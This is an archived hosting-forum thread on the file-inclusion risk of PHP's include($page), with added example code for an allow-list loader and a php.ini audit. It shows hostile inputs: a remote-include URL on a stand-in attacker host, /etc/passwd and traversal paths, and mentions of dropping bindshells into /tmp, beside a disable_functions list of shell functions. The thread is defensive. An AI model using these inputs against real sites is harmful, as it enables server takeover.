View Full Version : Is "include ($page);" dangerous?
jaschwa 10-24-2003, 08:05 AM One of the sites I host has a php page with this statement in it:
<?php include ($page); ?>
The reason I looked at this site is that it was possible to get the page to download a file to /tmp using wget. Was the statement above what allowed this?
If so, would it also be possible to execute a program which was downloaded to /tmp?
Burhan 10-24-2003, 08:53 AM This is exactly why register_globals is off by default on new php versions.
For example ... someone can simply do this :
index.php?page=/secret.txt
and then $page will be "/secret.txt", and the script will happily include it.
Maybe you should ask whoever coded the page to recode it (there are a few ways to avoid these types of security problems).
That's not what your question asked, but I thought I'd add that in there ... now on to your question :
wget is simply a program to download webpages/files off of the internet. It is possible to block wget-specific requests (by doing a check for client requests from wget) -- but it would be moot.
Blocking requests from wget would be the same as asking to create a site that would only be visible to IE browsers.
That statement alone didn't (and can't) allow wget, but it's a problem as it is.
Yes, it is possible to run programs from /tmp.
perfectphp 10-24-2003, 02:33 PM Too dangerous to even think of using it.
The Prohacker 10-24-2003, 02:44 PM Well... You never want to just use input taken from the user on blind faith... You should filter every inputted variable...
Notify the user to please fix the code in the php script so that it prevents manipulation from an attacker.
You can suggest the user add an array and supply possible variables (files) in the array, then to have the script check for the file in the array. If it finds it, load that variable/page otherwise load a default page.
Give them a choice:
- Either fix/remove the code, or you will be left with no choice but to remove the file, as a step to prevent harm to your server.
ock1991 10-24-2003, 11:06 PM You can use the function file_exists to get rid of people including harmful code into your server (that means even you can't have anything that harms your own server).
I'm also a complete newbie... but perhaps this will work:
<?php if (file_exists($page)) { include($page); } else { print('file not found'); exit; } ?>
digitok 10-24-2003, 11:39 PM $allowed_pages = array(
    'page1.php',
    'dir/page2.php',
);
// Only include a file that is literally in the list; anything else is ignored.
if (isset($_GET['page']) && in_array($_GET['page'], $allowed_pages, true)) {
    include($_GET['page']);
}
Something along these lines would be a safer alternative.
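A worked version of the allow-list approach suggested by The Prohacker and digitok above, added here as an example and not code from the thread. The vulnerable pattern is kept beside the hardened one so the difference is visible: the client sends a short key rather than a path, the key is looked up in a fixed map, and a realpath() check confirms the resolved file still lies under the pages directory. The directory layout, page names and the throwaway temp directory are constructed for the demonstration. Note that a plain file_exists() test would not block any of the hostile inputs shown, since /etc/passwd exists, and that the http:// form reaches include() only if allow_url_fopen (and, on PHP 5.2 and later, allow_url_include) is enabled.

```php
<?php
// Added example, not code from the thread. It puts the vulnerable pattern
// the thread is about beside an allow-list version of the "page" loader:
// the client sends a short key, the script maps the key to a fixed path, and
// a realpath() containment check guards against mistakes in the list itself.
// The directory layout and page names are constructed for the demo.

declare(strict_types=1);

// Vulnerable: the request parameter *is* the include path. ?page=/etc/passwd,
// ?page=../../etc/passwd and (with allow_url_include On) ?page=http://... all
// reach include() unchanged. file_exists() does not help: /etc/passwd exists.
// Kept here only to show the pattern; it is never called below.
function loadPageVulnerable(string $page): void
{
    include $page;
}

// Hardened: only these keys are accepted, and only these paths are included.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'dir/contact.php',
];

function resolvePage(string $pagesDir, ?string $key): string
{
    // array_key_exists() compares keys exactly; anything not listed
    // ("../x", "/etc/passwd", "http://...", "") falls back to the default page.
    if ($key === null || !array_key_exists($key, ALLOWED_PAGES)) {
        $key = 'home';
    }

    // Defence in depth: after resolving symlinks and ".." the file must still
    // sit under $pagesDir. This catches a bad entry in ALLOWED_PAGES itself.
    $base = realpath($pagesDir);
    $real = realpath($pagesDir . '/' . ALLOWED_PAGES[$key]);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("page '$key' is not available");
    }
    return $real;
}

function loadPageHardened(string $pagesDir, ?string $key): void
{
    include resolvePage($pagesDir, $key);
}

// --- demonstration with a throwaway pages directory (constructed data) ---
$pagesDir = sys_get_temp_dir() . '/include_demo_' . getmypid();
mkdir($pagesDir . '/dir', 0700, true);
foreach (ALLOWED_PAGES as $file) {
    file_put_contents("$pagesDir/$file", "<?php echo 'rendered $file', PHP_EOL;");
}

$inputs = ['home', 'contact', '../../etc/passwd', '/etc/passwd',
           'http://badsite.com/somescript.txt', '', null];
foreach ($inputs as $input) {
    echo str_pad(var_export($input, true), 36), ' => ';
    loadPageHardened($pagesDir, $input);   // only ever includes a listed file
}

// clean up the demo directory
foreach (ALLOWED_PAGES as $file) {
    unlink("$pagesDir/$file");
}
rmdir("$pagesDir/dir");
rmdir($pagesDir);
```

Run it with the php CLI: each listed key includes its own page, and every unlisted value, including the traversal, absolute-path and URL inputs, falls back to home.php instead of whatever the attacker named.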
Techark 10-25-2003, 12:16 AM Defacers love to find pages like that. It opens it right on up and yes it allows them to dump all kinds of programs in tmp and run them. Things like jacktheripper, bindshell, etc etc
Leave it long enough and they will gain root. In the mean time they will deface your web sites and make your customers very leery of your security.
Quadra 10-25-2003, 12:30 AM Originally posted by Monte
Defacers love to find pages like that. It opens it right on up and yes it allows them to dump al kinds of programs in tmp and run them. Things like jacktheripper, bindshell, etc etc
Hi Monte, how can that be used to write to the server?
biggulp 10-25-2003, 01:06 AM Include only parses PHP from a file, and if it isn't PHP, just outputs it onto the page? How can it be used to download files into /tmp?
Techark 10-25-2003, 01:11 AM Well I am not going to post the how tos here in the public or every kiddie reading this forum will be out trying it tonight. But take my word for it. Show me a web page like that and I can deface your box and start my way to gaining root on your box.
I found several URLs that are helpers just for this purpose set up by defacers. How? They cracked a couple of my resold boxes using just this exploit on php pages. I spent days doing a post mortem on the hack so I could understand it and stop it. I traced and tracked it back to the origin and found some of their launching pads for the hack. Lots of sites on GeoCities, Tripod, Lycos and other free web hosts.
Includes in php pages are dangerous to your server and the web site it is hosted on.
A couple of things you can do to slow them down: make /tmp noexec, add allow_url_fopen = False to your php.ini file, turn register_globals off, and turn PHP safe_mode on.
bohemian 10-25-2003, 02:14 AM Can you explain to me? What's "/tmp"?
yoshi
Quadra 10-25-2003, 02:32 AM Hehehe thanks I know how :)
Techark 10-25-2003, 02:59 AM Originally posted by Quadra
Hehehe thanks I know how :)
Some how I figured you did. :D
Burhan 10-25-2003, 03:04 AM you can also use safe_mode to exclude certain directories from being included.
dreaded 10-26-2003, 09:15 PM yeah it's a little dangerous
Host Ultra 10-30-2003, 11:28 PM Originally posted by fyrestrtr
For example ... someone can simply do this :
index.php?page=/secret.txt
and then $page will be "/secret.txt", and the script will happily include it.
It gets worse than that...
index.php?page=http://badsite.com/somescript.txt
this will make it download and include the code!
So if somescript.txt has say
<?php
phpinfo();
?>
it will execute it on the server!!
singhk 10-31-2003, 02:59 AM Someone said register_globals=off should do it. Well, that will not help, as one can easily circumvent it using $_GET. Also, how many PHP files will you check on your server? There are several practical ways you can follow even if your clients use page=file.html syntax. These have already been mentioned in several WHT threads.
1. Chmod wget and other files which only the superuser should have access to, to 700 or 744 mode. This will help you not only in this case but also where CGI scripting is concerned.
2. Have the following directives in your php.ini:
disable_functions = dl,exec,passthru,proc_open,proc_close,shell_exec,system
allow_url_fopen = Off
3. Use open_basedir directive for each virtual host. This you can do from WHM.
Hope it helps you
K Singh
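To see which of these settings are actually in effect for a given PHP, here is a small audit script, added as an example and not part of the thread. It reads the live values with ini_get(), so it also reflects per-vhost overrides (php_admin_value, .user.ini) that a look at the global php.ini would miss. The expected values are K Singh's and Techark's recommendations from above; allow_url_include is my addition, since PHP 5.2 and later govern remote include() with that directive separately from allow_url_fopen. register_globals is reported only on PHP versions that still know the directive.

```php
<?php
// Added example (not from the thread): report which of the php.ini hardening
// settings discussed above are in effect for the interpreter running this
// script. ini_get() is used so per-vhost overrides are seen, not just php.ini.
// Expected values follow the thread's recommendations, plus allow_url_include
// (my addition; PHP >= 5.2 controls remote include() with it separately).

declare(strict_types=1);

// true/false for a boolean directive, null if this PHP does not know it
// (for example register_globals was removed in PHP 5.4).
function iniFlag(string $name): ?bool
{
    $v = ini_get($name);
    if ($v === false) {
        return null;
    }
    return in_array(strtolower((string) $v), ['1', 'on', 'true', 'yes'], true);
}

/**
 * Returns a list of findings; an empty list means every check passed.
 * Each finding is [directive, effective value, why it matters].
 */
function auditIncludeHardening(): array
{
    $findings = [];

    foreach (['register_globals', 'allow_url_fopen', 'allow_url_include'] as $flag) {
        if (iniFlag($flag) === true) {
            $findings[] = [$flag, 'On',
                'should be Off: a user-controlled include() can be fed a remote URL or a forged global'];
        }
    }

    // The functions the thread recommends disabling; report any still callable.
    $wanted   = ['dl', 'exec', 'passthru', 'proc_open', 'proc_close', 'shell_exec', 'system'];
    $disabled = array_filter(array_map('trim', explode(',', (string) ini_get('disable_functions'))));
    $missing  = array_diff($wanted, $disabled);
    if ($missing !== []) {
        $findings[] = ['disable_functions', implode(',', $disabled) ?: '(empty)',
            'still callable: ' . implode(',', $missing)];
    }

    // Without open_basedir, include()/fopen() may read anything the web
    // server user can read, e.g. /etc/passwd or another customer's config.
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = ['open_basedir', '(unset)', 'no per-vhost file system boundary for include()/fopen()'];
    }

    return $findings;
}

$findings = auditIncludeHardening();
if ($findings === []) {
    echo "all checks passed", PHP_EOL;
}
foreach ($findings as [$directive, $value, $why]) {
    printf("%-18s %-28s %s%s", $directive, $value, $why, PHP_EOL);
}
```

Run it once from the CLI and once through the web server for each virtual host: the two can differ, and it is the web server's view that matters for a hostile ?page= request.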
linux-tech 11-03-2003, 09:26 PM safe_mode is great, but if you use a number of publicly available scripts, you will need safe_mode off.
Host Ultra 11-04-2003, 04:19 AM The problem with allow_url_fopen = Off is that many clients will complain about it.
mikeh80 11-04-2003, 04:24 PM There isn't anything wrong/dangerous with using include like this, is there?
<?php
include("blah.php");
?>
linux-tech 11-04-2003, 04:35 PM No, there isn't, because the filename is specified.
See with include ($page), I could go to say
http://www.mydomain.com/page.php (which should include a global page), and tell it, WAIT I don't want you to include the one you're supposed to, instead, let's do this:
http://www.mydomain.com/page.php?page=blahdebladeblahdeblahdeblah
and it'd include the one -=I=- told it to , not the correct page.
With the way you suggested, it's not possible to do that.
Mr_PHP 03-26-2004, 11:46 AM I just noticed this discussion - Look at this page for how to use PHP include safely:
apv-webdesign.nl/weblog/archives/be_careful_with_the_include_function__24-01-2004.php
Regards, Arno
Misto-Roboto 03-26-2004, 01:01 PM Originally posted by fyrestrtr
This is exactly why register_globals is off by default on new php versions.
For example ... someone can simply do this :
index.php?page=/secret.txt
What exactly does register globals do anyways?
Sheps 03-26-2004, 01:52 PM When you have stuff like $_POST['page'] or $_GET['page'], it allows you to use $page.
Espanet 03-27-2004, 08:46 AM You can also tell the owner of that file to hard code the filename, instead of using $page, you can use the one that is necessary, e.g.
include("header.php");